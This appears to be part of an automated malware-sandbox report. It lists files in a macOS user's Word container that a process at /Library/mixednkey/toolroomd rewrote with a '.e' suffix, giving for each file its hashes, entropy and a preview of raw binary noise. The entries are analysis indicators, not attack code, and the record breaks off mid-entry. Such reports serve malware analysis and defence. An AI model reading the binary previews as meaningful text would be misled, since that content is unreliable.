4<G.v.l'2bM....=>^,.1..Q..m5.m>..z....LSs<...q...\|&X..E.O......Q.*E....eL.....!...Z.

/Users/berri/Library/Containers/com.microsoft.Word/Data/Library/Application Support/.whatsNewJSONCache.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	3554
Entropy (8bit):	7.816836297849097
Encrypted:	false
SSDEEP:	48:yjzQcyH/+hD7I938IsD3vpn+Tow+kwNzCCF+/3hsAD2oUjYcuN5uv2Nmt+BxNpq:yjvyHGNIX+ksz7F+/3hsCUccOhksfu
MD5:	881DAA8A04FF1CE54DB940FE674483F1
SHA1:	2BDD4ECD2EDBBFBE1CA94D0B3978E07F8AC63576
SHA-256:	E230CE358C24697BF9416E6044BEC6A37E19C6FE852C2D40BF40A4FE9E991966
SHA-512:	7453649C0FC7D5F04E7E0404D7D498D14F86A9FD0F63424656A0D83F60B4E6EAB24FDD8B4024FDD867BA75D4E6A217E7E11CF65DB81FEB4E2104C17549E4035E
Malicious:	false
Preview:	.....0..wMv..T.I.O.p%.E..L#...z`...}...._..}.kdD.A....."..,....<....w.4.h..........up..H?..8..\9......<...d./....3.j.`..O......^.G\..9..LL..{IX.#...>#,.R.3jE0...Py.Ndi~C..K-....u.^.T(3..0...B@.s}.......q...B.Q.'.F..{^....D.y.G...S6..Y=.G.}r.$?}8.0,...O..H.....p..,..Z..S..@.11...T.r.>W..`.....DUGw..d]...1.....~......E......p.1K...k...).~-k.H..u.>.OJ......9{..\:F.a...v...p.(.ual._..$H..s..j..._.{..J.C.5..Vw&....,d.....P]....,.1K~'.G...9..........74n.\"p.n.").g..0........b'>6X............H..R.'.....p.....MK=KF.4..".E..x....u....<..^.1H.....p.........&..3Fs..%.;..5#3.l@..e.U.d.C~P7&....9.H.....p....2..}:(D.wQ..nI.R...{...0....[....-C.......#..~.,..Z..\|.....5..}...QKxKH.......jR.+2.c.eX....N......4.\..l.......H...`N.......,..4.....g.~@.<..........c_...s.NM....9lU..\|.....g..T..\.8.d...F._..m[.:..F.c"E..8S.."Mb.<.ft.....s432..%T.Q..ys_..y..91.1.j......,.z..#..~.d.....^.y.:......d..B.$.......1.+E..76).@........\|3#...].N.?....O....^.F.c..^.R#...W

/Users/berri/Library/Containers/com.microsoft.Word/Data/Library/Application Support/Microsoft/FontCache/.systemfontmetadata.json.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	397290
Entropy (8bit):	7.98103244752926
Encrypted:	false
SSDEEP:	6144:LnMjNTETigTn53q7I48YUppu7+ow0zhhH88hNHbiW:ATcRD5y8YUnjIzn5HWW
MD5:	E0F33C40C861A0FA16D711C675698199
SHA1:	DEEBBA8598B7892F7B077ACBBABB143B269BF5CA
SHA-256:	780B22677CF58798DA315C28ADBB62AB4778A9053920DC56BFA45AF92FA70389
SHA-512:	633086A77276958BF451FE065FDC5CDEDA6EACAA75E965465673FE4CAA80F59C9369D67970631E7C627A829A799DEE1D6F89F7E717AB86C781A696CE49927C7F
Malicious:	false
Preview:	..f7.J.R...C.\|P._..z.b...>5T.K.p7 .ww..~W..T.x...{..j...%....,.B..ca..:.f..E&.;.l.[N8...~.x.o..?.ci.Z.`..u..y..[q.8..$\|jt..[...l6.........'h.O.8!6....9.:...4uv...%<;.SC"y...\?.,i..4uv.....6o....O.....tZl..){q<z.mF..$\|jt..[...fk]...L.3.(.o.A&T.._.EN..A.t.^..<?R..T..6RM....r.GH........$O.....=;..8....e7....Y4\|.b".h.#..5X;.I...$.#..OP..4...\|KH.J.u@.y...H..#&...mN.=.%N..!.h..9...`Kd._[E......!.....J%?...Z....4R....]...Y..8.0.XM.R......+....p.....>a9?X....../a2.....XK..(......%g..k.'v/].....-j.^.......[U...HB`OI..Dn.%mfj.kk)zv..q......pp..'.P<..Vv.0....<..#B......)<] .\|.&..Z.Q.....B.........l....AVC.....x..[....7.......0R....K.9...L......A....9....K.9..j...=s._..F.;...DrO;..&K.N%hXVz.O......\.......B..g}..K4..>..w.......O...J%M!...!...DrO;..&.O...J%mK7V....mA5..:#u.I,H...9.....wa..O........w~._`........0R..u..7.x.:.O.z^.,9.T..4..Uo.k.W.o....I...[.........k.........Q..k.e3B?....>.G=.....J{...w.*.fZ.UB.`.`.\+...<..#.4m.....uX..(t....T.'......"\|..

/Users/berri/Library/Containers/com.microsoft.Word/Data/Library/Caches/com.microsoft.Word/.Cache.db-shm.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	33091
Entropy (8bit):	3.72635146748511
Encrypted:	false
SSDEEP:	48:sD2NnDNpFgD5tLa+PGRMbLqBOAGDk6rlNpq:K2lNpqIBq7u
MD5:	D713498AFD5332A35355E1880E5D6D39
SHA1:	39E5F61FFC8125AA05F12FDDE40E7AA01F1DF802
SHA-256:	62A97777DB31122326D8F567F49E086E3E15EFB731E56EC307C7812E071FADFF
SHA-512:	562CD7CC7CB59D9A01DA0FDB4ABE55E558B876C98C825021D8925E40578152892C4F3B134D1CAFAD4CE16DA32867DD758D4550D0F238FAEB7BC4036588FACBC0
Malicious:	false
Preview:	f...#D....eLd...b.eCE.z.A.v.k.&.}...1.A.E.-Vf...#D....eLd...b.eC.[.....k.&.}...1.A.E.-V6<.."a...;..T..G...q.A"&6<.."a...}.Iqy.V^UN ...:.<..Yv.m...-...3o1..!......n...........L,._e...D..-><.}W.x..v3.E..o................S..M.1Ga...$.In....V...n............lw....(.......?J..?=c...S..M.1Ga...$..3.?..x.o....^....e..O.'F.[..(.^UN ...:.<..Yv.m...-...3......??o....^..r.}...q..t5.a..U..........S..M.1Ga...$.In....V..q.R.i.o....^..(......'.T.u\|...S...S.M.;._.r......V....\1a.{D.psQ......S..M.1Ga...$..}...Q....n...........t%....:.L...-..J...S..M.1Ga...$..3.?..x..4..#.x..S.m....Z....X.M^UN ...:.<..Yv.m...-...3......??o....^.R..8...(>.......Jm.....?.....V..6qU...D...E\|.d.....V..6qU...DJm.....?.....V..6qU...DJm.....?.....V..6qU...DJm.....?.....V..6qU...DJm.....?.....V..6qU...D...E\|.d.....V..6qU...D...E\|.d..+.....6qU...D...E\|.d.....V..6qU...DJm.....?.....V.........v6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Containers/com.microsoft.Word/Data/Library/Caches/com.microsoft.Word/.Cache.db-wal.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	787698
Entropy (8bit):	6.61186709261316
Encrypted:	false
SSDEEP:	6144:Q1qMD1HXXv1HLbYaAlsWe1jRWS2TVbKp4PbYG1A9MpTARW//UeARhh8TGunc2T+b:Ln/Z5MX
MD5:	1BBB0316E82E5FB0DB596A44AE016828
SHA1:	5B722CB92576674729D4D76789D4A8ADCAE53B50
SHA-256:	B7CEF9FF04826B8DA589C88466D0F2AC6A9A8645D5C35DE09DE8604FADA37FFA
SHA-512:	DE32486BCED98BFADD3F084AC5A839482AA741112459E82E81FC2E90E91AD89493999E80DA432105B86548EF13C3D456DFCD0BE396FEA13BF1DFCD0B5843FD64
Malicious:	false
Preview:	^u..o.F.47.W&.z.k.&.}....p.I.....7...xk.&.}...m.$n.."...d.=..._t........x.iE!....x<6<.."a....I,`...ax..J.....7...x..7...x6<.."a..6<.."a..g..{}:.c.P.>.T.Z..Y#)j12"..-..!....`..u.;2.c-/.6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....*Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Containers/com.microsoft.Word/Data/Library/Caches/com.microsoft.Word/.Cache.db.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	53589
Entropy (8bit):	3.601616927263299
Encrypted:	false
SSDEEP:	48:76HBY3OO/2sbj028GRp/oLP+501K2TxD4XRB2/OGNpq:8RujDL/oLGm11B4hBiOGu
MD5:	9DCDB17D6D5E32EB45B2F68064F1209C
SHA1:	0864BAF74F3428747441E12493858EEBD5C7F2AA
SHA-256:	96AEEC3C8337387EC8B23E0DAD1701906FD39F211DD94D178B9AE7B806E96504
SHA-512:	41811E38E1CD488C3F9957A47CFFCE3921D924F9CCDA9623C30580764BE078B9B818D16617E44F944E97CBF573DB79C1D249156A75FEFB0CC96EFF9C8F8F8076
Malicious:	false
Preview:	..d.=..._t.........X...vi..b..6<.."a....I,`...ax..J.....7...x..7...xt....Sq6<.."a...2.I6.1..P.>.T.Z..Y#)j12"..-..!....`..u.;2.c-/.6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Containers/com.microsoft.Word/Data/Library/Caches/com.microsoft.Word/.HSTS.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	586
Entropy (8bit):	6.363925693142772
Encrypted:	false
SSDEEP:	12:UEMb71OLrGu/H+7rkcjG1MyTmocsewLYTc+qGm7:UEi8LrG4HuHJtsePc0m7
MD5:	B5EA31E0AAF85790EBAF7C1B3AA85311
SHA1:	F2C111CF96233900199BAA7A0F0FDCBA5B7E617C
SHA-256:	C78B1EC44CB377C37C634C05BF64CA819C0C76990B8C7D7C250710FA204C8DF8
SHA-512:	B1C132F1B58B27D08D6B5BF9695A34BF7CB5138A9731E9703C86164DC18E9983A0A0C9DB8E77046AD421CCA539B5CD3E970F53132CBC5D373818EBD52D51DFA3
Malicious:	false
Preview:	...a>k...6...\......R...o..'.>H.....0l.V...\6....)...:8.><.7T.}.G...y..r#e.).p..W......4..l.....\|Va..H.J.VW...p.W....#..i#..usx.=..:r<hO..kA.X.B...b.....4.Y~e..R..:...I.....}........K.$...Pg..Bj......Wr.5./L..'0...<L.g..p...<..$.......rW..o.j..%.6<.."a..&)..%......................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.Word/Data/Library/Caches/com.microsoft.Word/fsCachedData/.00B014A0-3DF6-4BBD-BBC3-732E97AC6DC5.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	15162
Entropy (8bit):	7.971584553368004
Encrypted:	false
SSDEEP:	384:7x6pqE5So6DcJ/g0dmvOhmX9/tpUGBLgle82U+k6UFI4jB:sg43tkJUGJNw68jB
MD5:	9437C2D05F8132D1F2A838D1040AA6A0
SHA1:	FBDA6C10463DE2A2E85E9EBF86F4884F0D0209F8
SHA-256:	774AD308B091845D46DE2C6B75E1E1D3F9F2CC086D82C6A7CD069A9B7965D3D1
SHA-512:	145402D6FFBA195B3A7CC780ED0F68FE7C1DF14601BA7AB0466D36826D140ED402B99AD950DE989891E2E8CCF7DDF94394384D1183FC43CE28E20C0AC7C37715
Malicious:	false
Preview:	M...#.5..?....h.L8...4$@..`......./.m,...o.U..[+....Q... .....i..;. ....i.....l..m...)#u..)....C>..K.. .r...!._..=..!...0y-..{.]2W....H,..^Pd%.p.;U..?.8......\.N....]c.H..Rn..?>.....{<.}sQ......v....kT.....h;.......Vx.....b..i..\..H;ud.1...M.."Q.1r.....c.p....nO..q.n.....U%.5.9.)H...%K...pC...C.1...!..dQ...`.:.D....8......x.E....d.Ab2.........R.jYN.,.......g.q<.eg.._..;.S..H2..a..==....-K...D.......w.Cp..d.+..W....H6.^.......Ab2......<.;:Rd9l..0.'r.wl...Y.............\..K.Ki#,P1...}....K.Ki#,$..?...(.8.J.OB=t!..){...$...f#....cr..u+../b,n..['<.k.Mm.%W~.3..S.....A...B.}.OXC.] ~.IB%..].y..U........3.....)..2.@\....L...r..Q.d. ...s....^....c..u..%.U?.j.@.V>...v......+.`.s..[.x.I.f.5d4Z,..<\...k+..D..;9!K.....D.f.f#.9nk..>...u..X.t..O....C..&.....a.(..q.....n.{X.....J......1..+`H*V....J.g.#[)...~6...]......\|...U..8.&wT.B...3..\|.{J.=...t7.c...._.Crq.@..'..f.......&..[.g&...e..t...JU..V....e.M...l..N......n..Q.,......]...0...?\|...A.

/Users/berri/Library/Containers/com.microsoft.Word/Data/Library/Caches/com.microsoft.Word/fsCachedData/.064C18F6-70D4-4819-AE6C-979E97BDB58C.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	97255
Entropy (8bit):	7.9938058206794285
Encrypted:	true
SSDEEP:	1536:aaWuJ5AWZjCSppW1laifu5ThUosz7Fe0yNm+TyiOfUTaCDf9VjQHQN9yD:ahuJ5Aa7nIl9fu5Bsz7Fe0yNm+TydCDw
MD5:	0BEB8A2F0BB7F1A50CD6BDE4D6380DD1
SHA1:	663CF8DE6CCF0118C79BEC82791DB6B35824F49A
SHA-256:	CE88BE9BA6B95281BC67178E05EB7FB83AD0922C363A41FF86BE84416E3E7473
SHA-512:	8589F4C2F744FF2421086F9F3A37C0C2E1A860E870A5D3CDE922427C05F1E33B0BD9DB7788FA8B091FC1586888546D6E08512510372B0456AE30A938A9E844BE
Malicious:	false
Preview:	<...wN.0...3..z.d......x...........6C{._.WL....Z=..ilvc..id..>.#.[..o....z`.!...%.i..u@...M..._y.SX.;.....f.g..A+..Z..!_G-...HO%0....Q?.~JE`.e....$.C[q......J/........c.{.Z......kt.^....:.+.....j..+c..B..V.......4....)..L7..K'u.\...G.=e.f.F$..t.{F......A...A.....m....&..W}^.!.D.e....V.A........U..?.8......{.g0.8. S.}7.oU.Xz...l.@...XxR`..t....RR'u..L=6..F\|.:N......9M.....kC.-....UU..... (.......Z~...v.y.aG\.d"..'.e...2@..........>..W~f./.l..X\|&5+..M".,...&".$..#...w.vF.=J.m.....7u..F.=J.m........x{.>XA.#..M./3..\....^....~...qy=`y.u:.%..$g..?........):_.wT...(.x...b....6......!...x,..v.V.~e>.c..\|....5......Y....C5.>.7.{.5......\|~..v..).)7^.......%..4F.D=.#5.]i#.F.W..3.;....[..E....A...Y..m...Pl.."....k..{....fMT\s.\|..-.b:;y.{..A...\......S.......N.K(.Z.........<........g.f.M.8....t....G p@U......9.Whi..G'..G`#.2....X.#..6A......\....... ......u...F.....,BK.....+.....d..F&....q.Uloa.G...z.y.#OC.9.t..5j.~.(.`y<..0Nfh..c2...

/Users/berri/Library/Containers/com.microsoft.Word/Data/Library/Caches/com.microsoft.Word/fsCachedData/.0DA18A43-9D17-4D47-BD7F-D8C7A4177BC5.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	22083
Entropy (8bit):	7.970520435359811
Encrypted:	false
SSDEEP:	384:FJvQj8a37Usxq1jbb0xHdwKvK6B48QcW2TadF40kg5llaYBYX:FJna37UWq1jbb0x9wKS6YFK/g5llZYX
MD5:	49CD5FC6C525B012B840E8A071085160
SHA1:	95A12B875C08403AB406D21ACFB437F65EB8064C
SHA-256:	95AE4A72FE7C703718DD7CCB4F0F707B977CDE9F60DBE689454CDC71088596A4
SHA-512:	57FA19AC56078BB185DBFFE5ECB0826DDB14624E0DDAA6963249B354D1DA76CFBAF0BC05F0770A4B4B353C500ED4D16FB541482128BF6C9FB0521EB756C21ECB
Malicious:	false
Preview:	I....`.......g..HO.A=<...d`....d..Y..V..D..K....+....d..4p.......g.....M...T.8\|\|Hu...2,gM.B$p.t.b.-.VBb..o`C....Oh..B....;...u..?.....-ik.D.v....;...6=Z,......@..m".....d....8..bj.......L..b nQ...[....9..h^`>..5.....u=.N5..v....t#...c2...C........xVv?....@.;q't..8f<..k0c.Q.....A>n..v..A]3.Xx...c.;0.6..i.C.~......z.U} .v.......8.V.W4...\...F.......>.......Y.r.\.....R.9{.&.\|..,-H=.tC.7.j......Y.r.\a....o..n...4..E.....l.$G..:0;hf.....A../.......nG...}.TT..(..".o.l`.m\FE..Arl...F...y.v.....\.!.5.!..-..J.vV.....(.20....&.&...g{..`-..._.o........a4}4Z.......n.....q..s.aQwz>p.E..`.by59.y.R\j.!$r.V.u..4B...I..r.....T....b.m...+W.-6.)K..U.$6.[...7D.8..}7....=T'.(.GBb.b.V.`.._....J.W......a..c.F..V.5.@....X...{Q.../.^.w{..(...T...(i.C.....!y...rZV..):.uxf.H.EH!...x1(.m....U.]<....^biz......p...:.6OY@....S.q..05d.x.2@;..7...a,..Q..X3.\......9L..GX-'......T.8\|e`3.EK..\|.O>jZBOjU..#.....g'..eT.....3...../...b.i.%'..#I...\|.3......./..v.:..P.....

/Users/berri/Library/Containers/com.microsoft.Word/Data/Library/Caches/com.microsoft.Word/fsCachedData/.1C6B9DD1-DC3C-4FC9-B530-4B2EE8648C76.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	412363
Entropy (8bit):	7.980827677943088
Encrypted:	false
SSDEEP:	6144:mV+PRLGlpZjXWTZwfqaF7lkFjzlUm0qIPVtXGI/F2gwDfcL4fuX7YkkF99zRGUuB:BJGlfGTqfq6lk9dGnwDfiP/SpRGUM
MD5:	CE9F01BB39454F8B17985FF26E7C4644
SHA1:	88B9F7ECEB96EB86FA93E7D4E2541449782FDF8F
SHA-256:	9E199534435529AC6A9DF4F8CAA541C666F4564A9F8056D6B76FCAAEC94F8286
SHA-512:	A0B845438B19A2D50666F3ECD6909538BCC37161A5D14D1F49A036D97E4B152B6A5654E009B204364E0505F777A3F8E7ABB02DE2A229E5D2648ADF06496BB266
Malicious:	false
Preview:	.:..>oi...R....,..R....,..R....,..R....,..R....,LeA.{..0...........C...N.z\.b....R....,..R....,..R....,..R....,..R....,.\|..3...YS<2.`.J-G..!..~b}.%~V:.<...`..P.Ul.tw.....A.b..:$....I../.#.......R.G.u.m.)......H.{B...."Fg'.U..=.Ro2n\|.;\.]..0/...1....>R}.._..T...p.R..).z.2..<."..l...^o...,v.....5(..w..Ao.&..B....g....n0.......9.1..$.....Ud.C^..k......c9.....[..r.u..j.)...\|.Y..6.g....{.Z..O.cl.+o..A...DJ.........;k>~n.j....._.P.E..r.....8..p..wmKY.p.....M..WC.\|..F.B.DE. ..1.r.f........=S%..(U..(u.bG..yp.@....s....k.=...k.....wb.}_..L.w..2,..Q....SD^...XZ..T...D.....l...'.Q7.tK1.`'..^..WU-..S_...._...;[.}..d....f.q:..A\|.2..l....t9..=.......XE.g...u.q....Vp:.vC..L..z.8Y.?^P^i\|.5dY.g..k2....2.......\......r.....&..P. I.F!.v.h.s....V.+8.U...[6P!...8Z.../.li..._(W.G..R....,..R....,..R....,..R....,E.Qh5.sn......%=..i"..5.[....u.isI.r....R....,..R....,..R....,..R....,.8..wS.z.....#d.I..5j.~.(.y.1...!.].s\|zi.......{&..E..M.A1.M*.F.U.8.V.....rJ...j

/Users/berri/Library/Containers/com.microsoft.Word/Data/Library/Caches/com.microsoft.Word/fsCachedData/.2EA232BA-9578-45E9-81B1-BE7F58334157.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	17491
Entropy (8bit):	6.854889353148229
Encrypted:	false
SSDEEP:	192:F4//4//4//4//4//4//4//4//4//4//4//4//4//4//4/z224222k22o22P2SGGf:AGG5GGYGGGeGGCGGRXnSSSS5
MD5:	DCBEE04F5A5813985D000EA8CBC5C389
SHA1:	3B83478FB9E028B27CF2410BC24DF2E57CF36422
SHA-256:	5066AC4DFE5658E9ED9B3D33C181D7F5A7C795FD948B4ACD852855527F52DE47
SHA-512:	FE19976B205D42B07A54D187A8A281C6D61819DA2803343D234B1B01261CDD077A07B8DDA34B214E6830EF6013AEEC2494D7684E6F199CFCCA5DBFDE2815707F
Malicious:	false
Preview:	.l..)..(.....p5_N.....bs-Yo.w...E.......a...1N.4.M.7.P.@..8O.DR'....X...&.H......uC..:...>.0)v....y..Ts'4.l..m...s..`.r..6<.."a..6<.."a..rZ.Al.G.........Y...6<.."a..6<.."a..6<.."a..6<.."a......Q.:........................^.uB.....'uB.....'uB.....'eh...+z.........................^.uB.....'uB.....'uB.....'l..?<b.........................^.uB.....'uB.....'uB.....'eh...+z.........................^.uB.....'uB.....'uB.....'eh...+z.........................^.uB.....'uB.....'uB.....'eh...+z.........................^.uB.....'uB.....'uB.....'l..?<b.........................^.uB.....'uB.....'uB.....'eh...+z.........................^.uB.....'uB.....'uB.....'eh...+z.........................^.uB.....'uB.....'uB.....'eh...+z.........................^.uB.....'uB.....'uB.....'l..?<b.........................^.uB.....'uB.....'uB.....'eh...+z.........................^.uB.....'uB.....'uB.....'eh...+z...................

/Users/berri/Library/Containers/com.microsoft.Word/Data/Library/Caches/com.microsoft.Word/fsCachedData/.40A8ED09-D2AF-40E6-801D-9A9C2351030F.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	60693
Entropy (8bit):	7.990507180840925
Encrypted:	true
SSDEEP:	1536:RmoLK1ccNVmzEsNn3vTAW/FQaTWTrSjdX5NpHUr09i:pK1VqEsJ3vkwQaArqJ6r0i
MD5:	9C5742A0BF20EDF1F60EA81F96378F47
SHA1:	A194975EC2524667B1BA9FAF0B26B8C8D090FE8B
SHA-256:	263890D99CE22588567664923A5E446D1A848D0B718A11222DC22DAEF585BF9F
SHA-512:	E688CE23683370CD44399633D78C7010E9C8057930770FCD94FC57D53DABAE512EC0CE5EA42E6687C0CBC5A519451DF271BD95B58BD9FC6AADCD48AEE218AF80
Malicious:	false
Preview:	Ci.^.!.2.o.a.n.7..8(.t..........9.^."1cg....j....@.4..h.]..%NoV.V9....}.,.!....d.......".Y.Yd.e.~...b..b....Q.....4..j..7..-.I....7[0w.~D9p}Ar.[.....P.....8.s.....]......#H....U..?.8.........h\..w..$.0.w{.$..P.....D...U...^>.U'....Eml.."..q{..WE.....^lX....>.5j.~.(..0 ..}.zK..N=XJ..$YA ..a{_....\|#......P..wy.1.......~.w..:.>...?.!..7q,.L...r..}.^.....'[.k.3.;.h>......$YA ..MV.\..%.l_..A$....1hM.>..9i.@(.....3@.....Sc.U..?.8....{l<..J..^60ue...C.e.W..3.;..,Ta.}./.x...Ox...I.^.d....=...u. o....u..PP.E+cA...1.....#.Qe.v..4`Nr.......w.._._..}0.U....#.1q..\|......t..Dn.;$.....+=2...1......5j.~.(.^.s1.k..\|qeJ8T..^.f+.P...Y....0bE@..}C..H.O.....r..)....Y)..m...%!.>..XK......&....D.H\|_..a..]}?\|...F..E.9B..s.Q(..W.5.........,.E7.'dyD...d..b....(...l....U.vy...bE......K{G.=z.M...3G.."........o-..n.d.r].^@...........T..b.:x..T....N>..7.l.o..dW.#.....s..I.Y..Hi.,.........u+.N.}...gi.....F.].....k.j...8.....+...3<.D].W.+ .0...\xX..I.3..4.vr.L

/Users/berri/Library/Containers/com.microsoft.Word/Data/Library/Caches/com.microsoft.Word/fsCachedData/.53BCA97B-B0A9-4707-BFFE-194E46C779D8.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	105736
Entropy (8bit):	7.99127685037626
Encrypted:	true
SSDEEP:	3072:cKPEgEbQbqjfuSicvpSZi0bUfej2QmEthYDFtZlUaxAC2iPF:cqh2LTqGeVdt6TWC7F
MD5:	AD3E7AF9267711E53238722FF2691BE2
SHA1:	9E3883DCD4BE22FFA3ABD8D0F8956260CA104AE9
SHA-256:	D0DE6EEB124EDB281C35DF9417D0B202D821A6E1CD3EC80EFE2D12F416869CE1
SHA-512:	8AC96681051AE8BA2BF378390F12B36F00419775BD2CA5CA868CABD71626ED51DB93A788BAFF0A033E361422F3BF5294FA1013F150BFF3ED3283B470D2DAC2DA
Malicious:	false
Preview:	..DR..$A...!...by..hUd.....L..P<..xVeQ...O]H.....8iE....m.. ...->H.YE.Qh5.sn..R....,..R....,..R....,..R....,p.n....\|=..i"..5.[....u.isI.r....R....,..R....,..R....,..R....,.Y.~...YS<2.`.J-G..!..~b}.%~V:.<...`..P.Ul.tw.....A.b..:$....I../.#.......R.G.u.m.)......H.{B...."Fg'.U..=.Ro2n\|.;\.]..0/...1....>R}.._..T...O_.,V.j..2..<."..l...^o...,v.....5(..w..Ao.&..B....g...kB).;.K...9.1..$.....Ud.C^..k......c9.....[..r.u..j.)...\|.Y..6.g....{.Z..O.cl.+o..A...DJ.........;k>~n.j....._.P.E..r.....8..p..wmKY.p.....M..WC.\|..F.B.DE. ..1.r.f........=S%..(U..(u.bG..yp.....3....k.=...k.....wb.}_..L.w..2,..Q....SD^...XZ...^.......l...'.Q7.tK1.`'..^..WU-..S_...._...;[.}..d......X....R....,..R....,..R....,..R....,..R....,..R....,..R....,..R....,..R....,][..{..r.'?.].O+.#.............R....,..R....,..R....,..R....,E.Qh5.sn..R....,..R....,..R....,..R....,l.A.......i.v.t..nH..9...h..j....f....WM.u3F....P.B...k.XH6.'.~.....4#..r...j_0kT......^.:6....Z3.h.....O.......D{

/Users/berri/Library/Containers/com.microsoft.Word/Data/Library/Caches/com.microsoft.Word/fsCachedData/.8A11ABDA-1B30-4E74-8C59-7F6EC8557627.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	32187
Entropy (8bit):	7.986432837011593
Encrypted:	false
SSDEEP:	768:+zGX3ZQQGC0cYY0+j1sSeYRWiczrMimhqtRbddmdqAqMjPdGpafYgdV+nznQMIJH:+CXJfKlhVEWiKr6qtJdslW0KMf
MD5:	720CA5BEEBA7F0DCE753CE414B2392E1
SHA1:	7BEF48AA2DC2E6F4DBB98F16F9CD4DD4E4BBA832
SHA-256:	06EBD6747BB65DBCCBD075AACA4E4ADFCA1FF6C0BE76ACC85603C49B7F551FE5
SHA-512:	EF7D7CAE239BB4050C74E44C2B445CA85014B4DC0ABD15DE2DA315F1B37AF7CDB70F193DE7C752C28C9A5385410CD4EAB4DCD3D227F9C11AE201488B5A8CFCE0
Malicious:	false
Preview:	{....C}8...oq.N.+..2l......+...D....i....~e$.pr..r.....mW.T.[4......%.h..6.o..U..?.8..^..w..\....=....D.JH. ...g....\|.=....v.....N..F"])&@.V#.sC....M%1Z;..'.%Cj.1x.9;.:..0)<@O.Dc....Q4...U..?.8.....,b.<.q..8.ts8..\.ow.^....~...qy=`y...,^.W...O+.t..x(....T.i..^.@....~6fFZ.J..;.$.mW'.1.Mxz....5..... ..5E....b>...v...........j.l:....~. .<...B.6....A..h..J.$b'J.A....6...b;.J..x.%.3.....E.U.......x.RR......U.(..J.J. .T.J.V...qV....=C...m#e.&J.].#C...5j.~.(..QX;.n..'....3...t..w.H....N!.5&....m.......>..._E_1].2....[L..yV..N.%.K.p..a...JS..Q.6..p3.+...V.%.n..~o4....G.2/$.<.\|...........GFm.Y.<.....ui..G..-.!..........>..W~f./..`Q..,m.9..>.'..].l..V.Z6I..i1...3.Gl...O`..0Z.#....O..8Q......f...^G..w.q.RF.1_%.]u..E...O.t..W.s..h.FWT......v.'i..(..A.,?a....G].M{P<0........y...J..........r^..Hq....7X+.k.FP.&..B..J..V/..?..=-m...e".'.\1.~_./.@l..d...(6.9&.._..D...g)m.3......w.5...H.ST..=..u.p. Y.m.A3.l.......>*..W~f./..ZMOB..8.F.....'..1...q....$.

/Users/berri/Library/Containers/com.microsoft.Word/Data/Library/Caches/com.microsoft.Word/fsCachedData/.CD52F7E4-3CC1-4EE0-8E10-8A26E26204F2.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
